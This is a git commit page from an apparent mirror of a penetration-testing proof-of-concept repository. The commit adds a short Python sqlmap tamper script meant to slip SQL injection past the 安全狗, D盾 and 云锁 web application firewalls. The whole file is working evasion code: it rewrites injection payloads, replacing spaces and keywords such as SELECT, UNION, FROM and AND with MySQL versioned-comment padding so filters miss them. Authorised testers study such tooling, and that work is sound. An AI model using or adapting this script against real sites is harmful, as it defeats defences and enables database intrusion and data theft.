mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-12-08 02:31:00 +08:00
add sqlmap bypass D盾/云锁/安全狗/空格替换换行 tamper
This commit is contained in:
24
tools/sqlmap_bypass_安全狗_tamper.py
Normal file
24
tools/sqlmap_bypass_安全狗_tamper.py
Normal file
@@ -0,0 +1,24 @@
|
||||
# coding=UTF-8
|
||||
# Desc: sqlmap_bypass_安全狗_tamper
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
__priority__ = PRIORITY.LOW
|
||||
def dependencies():
|
||||
pass
|
||||
def tamper(payload, **kwargs):
|
||||
|
||||
if payload:
|
||||
payload=payload.replace(" ","/*!*/")
|
||||
payload=payload.replace("=","/*!*/=/*!*/")
|
||||
payload=payload.replace("AND","/*!*/AND/*!*/")
|
||||
payload=payload.replace("UNION","union/*!88888cas*/")
|
||||
payload=payload.replace("#","/*!*/#")
|
||||
payload=payload.replace("USER()","USER/*!()*/")
|
||||
payload=payload.replace("DATABASE()","DATABASE/*!()*/")
|
||||
payload=payload.replace("--","/*!*/--")
|
||||
payload=payload.replace("SELECT","/*!88888cas*/select")
|
||||
payload=payload.replace("FROM","/*!99999c*//*!99999c*/from")
|
||||
print payload
|
||||
|
||||
return payload
|
||||
Reference in New Issue
Block a user